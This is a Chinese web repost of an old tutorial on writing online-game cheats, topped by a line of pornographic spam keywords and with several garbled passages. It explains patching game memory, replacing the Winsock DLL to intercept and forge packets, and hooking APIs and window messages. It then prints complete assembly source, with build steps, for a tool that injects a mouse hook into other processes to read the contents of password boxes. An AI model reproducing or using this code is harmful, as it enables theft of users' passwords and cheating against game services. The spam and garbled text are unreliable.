免费高清特黄a大片,九一h片在线免费看,a免费国产一级特黄aa大,国产精品国产主播在线观看,成人精品一区久久久久,一级特黄aa大片,俄罗斯无遮挡一级毛片

分享

外掛編寫(xiě)完全攻略 -

 紫羽之殤 2010-07-29
相關(guān)文件下載 網(wǎng)絡(luò)包的截獲(1.0)
mpeg流媒體播放示例(1.0)
完整的替換socket源代碼
寫(xiě)篇文章給想學(xué)寫(xiě)外掛的朋友參考
一、先說(shuō)一下寫(xiě)一個(gè)外掛需要什么條件
1、熟練的C語(yǔ)言知識(shí)目前的外掛大部分都是用BC或者是vc寫(xiě)的,擁有熟練的C語(yǔ)言知識(shí)是寫(xiě)外掛的基本條件
2、具有很強(qiáng)的匯編基礎(chǔ) 一般游戲都不可能有原代碼的,必須靠反匯編或者跟蹤的辦法來(lái)探索其中的機(jī)理 ,所以有強(qiáng)的匯編基礎(chǔ)也是必不可少的條件
3、熟練掌握跟蹤和調(diào)試的工具有了上面2個(gè)條件后,掌握一些工具也是很有必要的跟蹤的工具,softice當(dāng)然是不二之選,至于反匯編的工具,我推薦用IDA PRO這個(gè)工具反匯編出來(lái)的代碼結(jié)構(gòu)清晰,非常好讀如果你不具有上面的條件,還是勸鴉?〈蠔茫?倮蔥?strong>外掛吧?環(huán)指?牛?環(huán)質(zhì)棧瘢?煜旅揮邪椎艫南詒??nbsp;
二、寫(xiě)外掛面臨的基本技術(shù)問(wèn)題
1、修改進(jìn)程的執(zhí)行代碼 要修改進(jìn)程的執(zhí)行代碼,要先取得進(jìn)程的ID,如果是由外掛程序啟動(dòng),返回值里就有進(jìn)程ID, 如果不是的話,需要用findwindow找到窗口句柄,再用GetWindowProcessID取得進(jìn)程ID,取得進(jìn)程ID以后,就可以用writeprocessmemory來(lái)修改進(jìn)程的執(zhí)行代碼了,使程序按照我們的意愿來(lái)執(zhí)行,石器外掛里的不遇敵、寸步遇敵就是用這樣的方法來(lái)實(shí)現(xiàn)的
2、截獲外掛發(fā)送和接收的封包
除了通過(guò)修改代碼來(lái)實(shí)現(xiàn)的功能以外,很多的功能都是通過(guò)修改封包來(lái)實(shí)現(xiàn)的,要修改封包,首先要能截獲它。 第一步是要跟蹤出發(fā)和收的位置,至于怎么跟蹤,我以后會(huì)提到,找到位置以后,有2個(gè)辦法,一是在那個(gè)位置加一個(gè)jmp語(yǔ)句,跳到你的處理函數(shù)位置,處理完后,再跳回來(lái),這種方法要求比較高,需要處理好很多事情,另一種辦法是往那個(gè)位置寫(xiě)條能造成例外的指令,比如int 3,然后用DebugActiveProcess調(diào)試游戲進(jìn)程,這樣每當(dāng)游戲執(zhí)行到那個(gè)位置的時(shí)候,就會(huì)停下來(lái),到外掛程序里面去,等外掛程序處理完以后,用ContinueDebugEvent 繼續(xù)運(yùn)行程序。今天先寫(xiě)這么多,下回將討論外掛的具體功能該怎么實(shí)現(xiàn)
今天來(lái)談?wù)?span id="kykmsyk" class="t_tag" href="tag.php?name=%b5%d8%d6%b7">地址的調(diào)查問(wèn)題,地址調(diào)查是寫(xiě)外掛中最艱辛,最富有挑戰(zhàn)性的事情,很多朋友問(wèn)我要外掛的原程序,其實(shí)有了外掛原程序,如果你不會(huì)調(diào)查地址,還是沒(méi)用的, 原程序和地址的關(guān)系就象武學(xué)中招式與內(nèi)功的關(guān)系,沒(méi)有內(nèi)功的招式,只是一個(gè)花架子。而內(nèi)功精深以后,任何普通的招式,都有可能化腐朽為神奇,外掛中的地址分為兩類(lèi),一類(lèi)是程序地址,一類(lèi)是數(shù)據(jù)地址。象石器中的雙石器,真彩,不遇敵,寸步遇敵,發(fā)送接收封包等,都屬于第一類(lèi),而人物坐標(biāo),狀態(tài)等,都屬于第二類(lèi)。對(duì)于第一類(lèi)地址,主要依靠softice來(lái)調(diào)查地址,對(duì)第二類(lèi)地址,可以用一些游戲工具,比如fpe,game expert,game master等來(lái)調(diào)查,我一直用game expert,因?yàn)槲艺也坏?000下能用的fpe, 各位以前用fpe改游戲的時(shí)候,沒(méi)想過(guò)他也能用來(lái)干這個(gè)吧 對(duì)于第二類(lèi)數(shù)據(jù)的調(diào)查方法,大部分人都很熟習(xí)了,我就不多說(shuō)了,現(xiàn)在主要來(lái)談?wù)劦谝活?lèi)數(shù)據(jù)的詳細(xì)調(diào)查過(guò)程,比如我們要調(diào)查發(fā)送封包的位置,如何著手呢,客戶端往服務(wù)器要發(fā)很多封包,但最簡(jiǎn)單的辦法莫過(guò)從說(shuō)話的封包入手,先說(shuō)一句很長(zhǎng)的話,最好是英文,查起來(lái)方便,說(shuō)完以后,用任意一種辦法進(jìn)入游戲程序的進(jìn)程空間(比如先用spy查出游戲程序的窗口句柄,再切換到softice打入bmsg 窗口句柄 wm_lbuttondown,這樣在游戲程序中一點(diǎn)鼠標(biāo)就進(jìn)入了他的進(jìn)程空間)然后用s命令查出這句話所放的內(nèi)存地址,記下這個(gè)地址,在softice中打入bpm 剛才調(diào)查到的地址,這個(gè)指令的意思是只要有訪問(wèn)這個(gè)內(nèi)存的動(dòng)作,立刻中斷,然后再切換到游戲,說(shuō)一句話,你會(huì)發(fā)現(xiàn)softice自動(dòng)中斷到某一個(gè)位置了,從這個(gè)位置跟蹤下去,發(fā)送封包的位置也就不遠(yuǎn)了。 上面所說(shuō)的都是針對(duì)一個(gè)全新的游戲程序而言,如果是一個(gè)老的程序,有前輩做了大量的工作,還可以用些別的辦法,如反匯編等,來(lái)調(diào)查。以后游戲版本的更新也是如此,只要把老版本的地址位置附近的代碼記下來(lái),去新版本的代碼里面search一下,就ok了。 恩,休息一會(huì)兒,休息一會(huì)兒
我主要對(duì)外掛的技術(shù)進(jìn)行分析,至于游戲里面的內(nèi)部結(jié)構(gòu)每個(gè)都不一樣,這里就不做講解了,我也沒(méi)有那么厲害,所有的都知道,呵呵!
1 首先游戲外掛的原理
外掛現(xiàn)在分為好多種,比如模擬鍵盤(pán)的,鼠標(biāo)的,修改數(shù)據(jù)包的,還有修改本地內(nèi)存的,但好像沒(méi)有修改服務(wù)器內(nèi)存的哦,呵呵!其實(shí)修改服務(wù)器也是有辦法的,只是技術(shù)太高一般人沒(méi)有辦法入手而已!(比如請(qǐng)GM去**,送禮,收黑錢(qián)等等辦法都可以修改服務(wù)器數(shù)據(jù),哈哈)
修改游戲無(wú)非是修改一下本地內(nèi)存的數(shù)據(jù),或者截獲api函數(shù)等等,這里我把所能想到的方法都作一個(gè)介紹,希望大家能做出很好的外掛來(lái)使游戲廠商更好的完善自己的技術(shù).




我見(jiàn)到一片文章是講魔力寶貝的理論分析,寫(xiě)的不錯(cuò),大概是那個(gè)樣子.
下來(lái)我就講解一下技術(shù)方面的東西,以作引玉之用
2 技術(shù)分析部分
1 模擬鍵盤(pán)或鼠標(biāo)的響應(yīng)
我們一般使用UINT SendInput(
UINT nInputs, // count of input events
LPINPUT pInputs, // array of input events
int cbSize // size of structure
);api函數(shù)
第一個(gè)參數(shù)是說(shuō)明第二個(gè)參數(shù)的矩陣的維數(shù)的,第二個(gè)參數(shù)包含了響應(yīng)事件,這個(gè)自己填充就可以,最后是這個(gè)結(jié)構(gòu)的大小,非常簡(jiǎn)單,這是最簡(jiǎn)單的方法模擬鍵盤(pán)鼠標(biāo)了,呵呵
注意:這個(gè)函數(shù)還有個(gè)替代函數(shù):
VOID keybd_event(
BYTE bVk, // 虛擬鍵碼
BYTE bScan, // 掃描碼
DWORD dwFlags,
ULONG_PTR dwExtraInfo // 附加鍵狀態(tài)
);和
VOID mouse_event(
DWORD dwFlags, // motion and click options
DWORD dx, // horizontal position or change
DWORD dy, // vertical position or change
DWORD dwData, // wheel movement
ULONG_PTR dwExtraInfo // application-defined information
);
這兩個(gè)函數(shù)非常簡(jiǎn)單了,我想那些按鍵精靈就是用的這個(gè)吧,呵呵,上面的是模擬鍵盤(pán),下面的是模擬鼠標(biāo)的.
這個(gè)僅僅是模擬部分,要和游戲聯(lián)系起來(lái)我們還需要找到游戲的窗口才行,或者包含快捷鍵,就象按鍵精靈的那個(gè)激活鍵一樣,我們可以用GetWindow函數(shù)來(lái)枚舉窗口,也可以用Findwindow函數(shù)來(lái)查找制定的窗口(注意還有一個(gè)FindWindowEx),FindwindowEx可以找到窗口的子窗口,比如按鈕,等什么東西.當(dāng)游戲切換場(chǎng)景的時(shí)候我們可以用FindWindowEx來(lái)確定一些當(dāng)前窗口的特征,從而判斷是否還在這個(gè)場(chǎng)景,方法很多了,比如可以GetWindowInfo來(lái)確定一些東西,比如當(dāng)查找不到某個(gè)按鈕的時(shí)候就說(shuō)明游戲場(chǎng)景已經(jīng)切換了,等等辦法.有的游戲沒(méi)有控件在里面,這是對(duì)圖像做坐標(biāo)變換的話,這種方法就要受到限制了.這就需要我們用別的辦法來(lái)輔助分析了.
至于快捷鍵我們要用動(dòng)態(tài)連接庫(kù)實(shí)現(xiàn)了,里面要用到hook技術(shù)了,這個(gè)也非常簡(jiǎn)單,大家可能都會(huì)了,其實(shí)就是一個(gè)全局的hook對(duì)象然后SetWindowHook就可以了,回調(diào)函數(shù)都是現(xiàn)成的,而且現(xiàn)在網(wǎng)上的例子多如牛毛,這個(gè)實(shí)現(xiàn)在外掛中已經(jīng)很普遍了.如果還有誰(shuí)不明白,那就去看看msdn查找SetWindowHook就可以了.
這個(gè)動(dòng)態(tài)連接庫(kù)的作用很大,不要低估了哦,它可以切入所有的進(jìn)程空間,也就是可以加載到所有的游戲里面哦,只要用對(duì),你會(huì)發(fā)現(xiàn)很有用途的!
這個(gè)需要你復(fù)習(xí)一下win32編程的基礎(chǔ)知識(shí)了,呵呵,趕快去看書(shū)吧!
2截獲消息
有些游戲的響應(yīng)機(jī)制比較簡(jiǎn)單,是基于消息的,或者用什么定時(shí)器的東西,這個(gè)時(shí)候你就可以用攔截消息來(lái)實(shí)現(xiàn)一些有趣的功能了.
我們攔截消息使用的也是hook技術(shù),里面包括了鍵盤(pán)消息,鼠標(biāo)消息,系統(tǒng)消息,日志等,別的對(duì)我們沒(méi)有什么大的用處,我們只用攔截消息的回調(diào)函數(shù)就可以了,這個(gè)不會(huì)讓我寫(xiě)例子吧,其實(shí)這個(gè)和上面的一樣,都是用SetWindowHook來(lái)寫(xiě)的,看看就明白了很簡(jiǎn)單的.

至于攔截了以后做什么就是你的事情了,比如在每個(gè)定時(shí)器消息里面處理一些我們的數(shù)據(jù)判斷,或者在定時(shí)器里面在模擬一次定時(shí)器,那么有些數(shù)據(jù)就會(huì)處理兩次,呵呵,后果嘛,不一定是好事情哦,呵呵,不過(guò)如果數(shù)據(jù)計(jì)算放在客戶端的游戲就可以真的改變數(shù)據(jù)了,呵呵,試試看吧!用途還有很多,自己想也可以想出來(lái)的,呵呵!
3攔截socket包
這個(gè)技術(shù)難度要比原來(lái)的高很多哦,要有思想準(zhǔn)備.
首先我們要替換winSock.dll或者winsock32.dll,我們寫(xiě)的替換函數(shù)要和原來(lái)的函數(shù)一致才行,就是說(shuō)它的函數(shù)輸出什么樣的,我們也要輸出什么樣子的函數(shù),而且參數(shù),參數(shù)順序都要一樣才行,然后在我們的函數(shù)里面調(diào)用真正的winSock32.dll里面的函數(shù)就可以了
首先:我們可以替換動(dòng)態(tài)庫(kù)到系統(tǒng)路徑
其次:我們應(yīng)用程序啟動(dòng)的時(shí)候可以加載原有的動(dòng)態(tài)庫(kù),用這個(gè)函數(shù)LoadLibary
然后定位函數(shù)入口用GetProcAddress函數(shù)獲得每個(gè)真正socket函數(shù)的入口地址
當(dāng)游戲進(jìn)行的時(shí)候它會(huì)調(diào)用我們的動(dòng)態(tài)庫(kù),然后從我們的動(dòng)態(tài)庫(kù)中處理完畢后才跳轉(zhuǎn)到真正動(dòng)態(tài)庫(kù)的函數(shù)地址,這樣我們就可以在里面處理自己的數(shù)據(jù)了,應(yīng)該是一切數(shù)據(jù).呵呵!
興奮吧,攔截了數(shù)據(jù)包我們還要分析之后才能進(jìn)行正確的應(yīng)答,不要以為這樣工作就完成了,呵呵!還早呢,等分析完畢以后我們還要仿真應(yīng)答機(jī)制來(lái)和服務(wù)器通信,一個(gè)不小心就會(huì)被封號(hào),呵呵,嗚~~~~~~~~我就被封了好多啊!
分析數(shù)據(jù)才是工作量的來(lái)源呢,游戲每次升級(jí)有可能加密方式會(huì)有所改變,因此我們寫(xiě)外掛的人都是亡命之徒啊,被人娛樂(lè)了還不知道,呵呵!(聲明我可沒(méi)有賺錢(qián),我是免費(fèi)的)
好了,給大家一個(gè)不錯(cuò)的起點(diǎn),這里有完整的替換socket源代碼,呵呵!
http://www./vchelp/zsrc/wsock32_sub.zip
4截獲api
上面的技術(shù)如果可以靈活運(yùn)用的話我們就不用截獲api函數(shù)了,其實(shí)這種技術(shù)是一種補(bǔ)充技術(shù).比如我們需要截獲socket以外的函數(shù)作為我們的用途,我們就要用這個(gè)技術(shù)了,其實(shí)我們也可以用它直接攔截在socket中的函數(shù),這樣更直接.
現(xiàn)在攔截api的教程到處都是,我就不列舉了,我用的比較習(xí)慣的方法是根據(jù)輸入節(jié)進(jìn)行攔截的,這個(gè)方法可以用到任何一種操作系統(tǒng)上,比如98/2000等,有些方法不是跨平臺(tái)的,我不建議使用.這個(gè)技術(shù)大家可以參考windows核心編程里面的545頁(yè)開(kāi)始的內(nèi)容來(lái)學(xué)習(xí),如果是98系統(tǒng)可以用window系統(tǒng)奧秘那個(gè)最后一章來(lái)學(xué)習(xí).
好了方法就是這么多了,看大家怎么運(yùn)用了,其它的一些針對(duì)性的技巧這里我就不說(shuō)了,要不然會(huì)有人殺了我的,呵呵!
記住每個(gè)游戲的修改方法都不一樣,如果某個(gè)游戲數(shù)據(jù)處理全部在服務(wù)器端,那么你還是別寫(xiě)外掛了,呵呵,最多寫(xiě)個(gè)自動(dòng)走路的外掛,哈哈!
數(shù)據(jù)分析的時(shí)候大家一定要注意,不要輕易嘗試和服務(wù)器的連接,因?yàn)槟怯泻芪kU(xiǎn),切忌!等你掌握了大量的數(shù)據(jù)分析結(jié)果以后,比較有把握了在試試,看看你的運(yùn)氣好不好,很有可能會(huì)成功的哦,呵呵!
其實(shí)像網(wǎng)金也瘋狂的那種模擬客戶端的程序也是不錯(cuò)的,很適合office的人用,就看大家產(chǎn)品定位了.
好了不說(shuō)了,大家努力吧!切忌不要被游戲廠商招安哦,那樣有損我們的形象,我們是為了讓游戲做的更好而開(kāi)發(fā)的,也不愿意打亂游戲的平衡,哎,好像現(xiàn)在不是這樣了!不說(shuō)了隨其自然吧!

  98下是可以的,但到了2000時(shí)代,不同進(jìn)程間不允許互相訪問(wèn)了,:(
偶找了篇文章,有點(diǎn)參考性,如下:
===================================================
利用鼠標(biāo)鉤子獲得Win2000密碼框密碼
獲得Windows下的密碼框密碼,似乎是很多人感興趣的話題,CSDN上問(wèn)這類(lèi)問(wèn)題的人不計(jì)其數(shù)……這樣看來(lái),老羅也不能免俗啦,今天就讓我跟大家探討一下如何實(shí)現(xiàn)這一功能吧。^_^
我們知道,Windows下有一條功能很強(qiáng)勁的函數(shù)——SendMessage(),利用它能夠?qū)崿F(xiàn)很多意想不到的功能,例如獲得密碼框的密碼就是其中一例。我們可以這樣做:
char szPsw[255];
SendMessage(hWnd, WM_GETTEXT, 255, (LPARAM)(LPCTSTR)szPsw);
通過(guò)發(fā)送消息 WM_GETTEXT 給目標(biāo)窗口句柄,我們就能夠獲得密碼框的密碼了,可是它還有一點(diǎn)不足,就是無(wú)法在 Win2000/WinXP 里面獲得密碼。這是因?yàn)?Win2000 對(duì)這個(gè)方法作了防范(當(dāng)然啦,老比因?yàn)檫@個(gè)問(wèn)題已經(jīng)業(yè)界被罵死了),只要你是對(duì)其他進(jìn)程進(jìn)行這個(gè)操作,就會(huì)失效。呵呵,這也就是為什么很多同類(lèi)的軟件到了 Win2000 就死翹翹的原因。 :)
那么是否就毫無(wú)辦法了呢?當(dāng)然不是!我們已經(jīng)知道了失敗的原因,就是不能在別的進(jìn)程中使用這一函數(shù)……嗯?……聰明的你是不是已經(jīng)想到了什么?
對(duì)了,只要我們能夠在同一個(gè)進(jìn)程中使用它,就可以實(shí)現(xiàn)了!如何做到“同一個(gè)進(jìn)程”?呵呵,這又是一個(gè)問(wèn)題?!禬indows核心編程》的大牛 Jeffrey Richter 告訴我們,實(shí)現(xiàn)“同一進(jìn)程”的辦法有很多種,例如有通過(guò)注冊(cè)表來(lái)插入DLL、使用遠(yuǎn)程線程插入DLL、使用特洛伊DLL來(lái)插入DLL、通過(guò)內(nèi)存映射文件插入DLL……方法真的是有很多種,它們都能實(shí)現(xiàn)“同一個(gè)進(jìn)程”這一目的,不過(guò)老羅覺(jué)得都不太理想,例如,使用遠(yuǎn)程線程是通過(guò)CreateRemoteThread() 來(lái)插入DLL,但是這個(gè) CreateRemoteThread() 在MSDN中是明確指出了不能在 Win9X
中使用的,也就是說(shuō),通用性要大打折扣。所以最后我決定使用鼠標(biāo)鉤子函數(shù)來(lái)實(shí)現(xiàn)!
聰明的讀者可能還會(huì)問(wèn)道:為什么用鼠標(biāo)鉤子就能實(shí)現(xiàn)了?其實(shí)答案很簡(jiǎn)單,因?yàn)槊艽a框是一個(gè) EDIT
控件,它肯定能夠接收到鼠標(biāo)消息,這樣,我們的鼠標(biāo)鉤子函數(shù)就能夠注入到遠(yuǎn)程的目標(biāo)進(jìn)程,這時(shí)的 SendMessage()
就是跟目標(biāo)進(jìn)程在同一個(gè)進(jìn)程里面,是可以取出密碼的。而且它有個(gè)非常好的地方:就是通用性強(qiáng),理論上任何一個(gè)版本的 Windows 都能使用?。?br>(我沒(méi)有 WinXP ,所以只好說(shuō)“理論上”啦,請(qǐng)有裝 XP 的朋友幫忙試試,OK?)
明白了吧?最后還有一個(gè)細(xì)節(jié)問(wèn)題——密碼是在鼠標(biāo)鉤子函數(shù)里面獲得的,那么如何返回給我們的主程序?老羅的做法是把密碼作為全局共享變量,這樣就可以在兩個(gè)進(jìn)程里面共享,我們的主程序就可以輸出結(jié)果啦!
說(shuō)了一大通廢話,希望大家不要介意。下面我給出一個(gè)完整的例子,通過(guò)鼠標(biāo)鉤子函數(shù)注入遠(yuǎn)程進(jìn)程獲得任何一個(gè)版本 Windows
的密碼框密碼。(呵呵,好拗口?。“?!別扔番茄!?。?
---------- 鼠標(biāo)鉤子函數(shù)的DLL ----------
文件名: HookDll.asm
--------------------------------------
;******************************************************
;程序名稱(chēng):獲取密碼框的密碼,適用于Win9x/WinMe/Win2000/WinXP
;作者:羅聰
;日期:2002-10-8
;出處:http://www./(老羅的繽紛天地)
;注意事項(xiàng):如欲轉(zhuǎn)載,請(qǐng)保持本程序的完整,并注明:
;轉(zhuǎn)載自“老羅的繽紛天地”(http://www./
;******************************************************
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
DllEntry proto :HINSTANCE, :DWORD, :DWORD
MouseProc proto :DWORD, :DWORD, :DWORD
GetPsw proto
InstallHook proto :DWORD
UninstallHook proto
.const
WM_MOUSEHOOK equ WM_USER + 6
;共享段:
.data?
hHook dd ?
hWnd dd ?
szPsw db 255 dup(?) ;關(guān)鍵語(yǔ)句!??!共享這個(gè)變量szPsw,以便在主程序中也能得到密碼!
.data
hInstance HINSTANCE 0
.code
DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason == DLL_PROCESS_ATTACH
push hInst
pop hInstance
.endif
mov eax, TRUE
ret
DllEntry endp
GetPsw proc
;關(guān)鍵??!返回密碼?。ㄇ疤崾敲艽a必須放在共享段!)
lea eax, szPsw
ret
GetPsw endp
MouseProc proc uses edx nCode:DWORD, wParam:DWORD, lParam:DWORD
invoke CallNextHookEx, hHook, nCode, wParam, lParam
mov edx, lParam
assume edx: PTR MOUSEHOOKSTRUCT
;獲得當(dāng)前鼠標(biāo)位置的窗口句柄:
invoke WindowFromPoint, [edx].pt.x, [edx].pt.y
;發(fā)送一個(gè)消息給當(dāng)前窗口,獲得它的標(biāo)題:
invoke SendMessage, eax, WM_GETTEXT, 255, addr szPsw
;發(fā)送一個(gè)消息給主程序,以便在主程序中能處理鼠標(biāo)鉤子函數(shù):
invoke PostMessage, hWnd, WM_MOUSEHOOK, 0, 0
assume edx: nothing
xor eax, eax
ret
MouseProc endp
InstallHook proc hwnd:DWORD
;啟動(dòng)鼠標(biāo)鉤子函數(shù):
push hwnd
pop hWnd
invoke SetWindowsHookEx, WH_MOUSE, addr MouseProc, hInstance, NULL
mov hHook, eax
ret
InstallHook endp
UninstallHook proc
;卸載鼠標(biāo)鉤子函數(shù):
invoke UnhookWindowsHookEx, hHook
ret
UninstallHook endp
end DllEntry
;******************** over ********************
;by LC

編譯這個(gè)DLL的時(shí)候記住要這樣:(否則會(huì)失敗哦?。?
ml /c /coff HookDll.asm
link /section:.bss,S /DLL /subsystem:windows /def:HookDll.def HookDll.obj
---------- 主程序調(diào)用 ----------
文件名: GetPsw.asm
-------------------------------
;******************************************************
;程序名稱(chēng):獲取密碼框的密碼,適用于Win9x/WinMe/Win2000/WinXP
;作者:羅聰
;日期:2002-10-8
;出處:http://www./(老羅的繽紛天地)
;注意事項(xiàng):如欲轉(zhuǎn)載,請(qǐng)保持本程序的完整,并注明:
;轉(zhuǎn)載自“老羅的繽紛天地”(http://www./
;******************************************************
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include HookDll.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib HookDll.lib
WndProc proto :DWORD, :DWORD, :DWORD, :DWORD
.const
IDC_EDIT_OUTPUT equ 3000
WM_MOUSEHOOK equ WM_USER + 6
.data
szDlgName db "lc_dialog", 0
szPsw db 255 dup(0)
.code
main:
invoke GetModuleHandle, NULL
invoke DialogBoxParam, eax, offset szDlgName, 0, WndProc, 0
invoke ExitProcess, eax
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL rect: RECT
.if uMsg == WM_CLOSE
;卸載鼠標(biāo)鉤子:
invoke UninstallHook
invoke EndDialog, hWnd, 0
.elseif uMsg == WM_INITDIALOG
;獲得主程序的rect:
invoke GetWindowRect, hWnd, addr rect
;把主程序設(shè)置成“始終在最前面”:
invoke SetWindowPos, hWnd, HWND_TOPMOST, rect.left, rect.top, rect.right,
rect.bottom, SWP_SHOWWINDOW
;鼠標(biāo)鉤子函數(shù)啟動(dòng):
invoke InstallHook, hWnd
;處理鼠標(biāo)鉤子函數(shù)的消息:
.elseif uMsg == WM_MOUSEHOOK
;獲得密碼:
invoke GetPsw
;輸出:
invoke SetDlgItemText, hWnd, IDC_EDIT_OUTPUT, eax
.else
mov eax, FALSE
ret
.endif
mov eax, TRUE
ret
WndProc endp
end main
;******************** over ********************
;by LC
---------- 主程序的資源文件 ----------
文件名: GetPsw.rc
-------------------------------------
#include "resource.h"
#define IDC_EDIT_OUTPUT 3000
#define IDC_STATIC -1
LC_DIALOG DIALOGEX 0, 0, 195, 30
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
CAPTION "Get Password by LC, 2002-10-8"
FONT 9, "宋體", 0, 0, 0x0
BEGIN
LTEXT "看看有什么:", IDC_STATIC, 5, 12, 50, 12
EDITTEXT IDC_EDIT_OUTPUT, 60, 10, 130, 12, ES_AUTOHSCROLL | NOT WS_BORDER,
WS_EX_STATICEDGE
END
怎么樣?看明白了嗎?如果你還不太懂得鼠標(biāo)鉤子函數(shù)的編寫(xiě),請(qǐng)先參考 Iczelion 的教程,到處都有哦!假如還有什么疑問(wèn),那是
-------------------------------------------------------------------------------
這兩個(gè)程序是應(yīng)廣大網(wǎng)友的要求寫(xiě)的。
其中網(wǎng)絡(luò)封包的攔截源代碼可以作為是我的游戲外掛分析那篇文章的例子講解吧。封包的分析要看經(jīng)驗(yàn)了,這里不好多講,如果仔細(xì)分析的話可能會(huì)講1000頁(yè)以上的內(nèi)容,一般的分析大家可以用通用加密和解密算法來(lái)試試,如果不行的話那就是商家自己的加密算法,這就比較難辦了,根據(jù)經(jīng)驗(yàn)自己試試吧,比如同時(shí)放大縮小數(shù)據(jù),看看有沒(méi)有匹配字符串,異或一個(gè)自己的編碼庫(kù)等等,查看有沒(méi)有明文結(jié)果,總之這些都是非常隨機(jī)的,所以你分析出來(lái)了一個(gè),但不一定可以分析出另外一個(gè)的,呵呵!祝大家好運(yùn)??!
http://www.csdn.net/cnshare/soft/14/14675.shtm
下來(lái)那個(gè)是一個(gè)mpeg的網(wǎng)絡(luò)流媒體播放程序,別的格式大家自己研究,可以看看我的專(zhuān)欄里面的directshow
中的注冊(cè)文件類(lèi)型(定位文件類(lèi)型)的文章,那個(gè)就是告訴大家怎樣確定一個(gè)文件的文件格式,和網(wǎng)絡(luò)播放一個(gè)道理,要預(yù)讀一定的數(shù)據(jù),比如mpeg的識(shí)別數(shù)據(jù)段在開(kāi)始部位,avi的會(huì)跳到很多地方等等,因此修改這個(gè)例子是很容易的,這里就不多說(shuō)了。
這個(gè)不是動(dòng)態(tài)鏈接庫(kù)的形式,大家可以隨便使用,但希望可以在源程序里面保留作者信息,謝謝!
http://www.csdn.net/cnshare/soft/14/14674.shtm
最近沒(méi)有時(shí)間,游戲外掛分析我暫停一段時(shí)間在繼續(xù)寫(xiě)吧,到時(shí)候我給大家做一個(gè)網(wǎng)絡(luò)游戲登錄的例子讓大家明白大概過(guò)程。

引用:這篇文章可能是好早的了,但是發(fā)出來(lái)希望大家都學(xué)習(xí)一下,不要挪作他用,僅作技術(shù)交流之用!

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買(mǎi)等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類(lèi)似文章 更多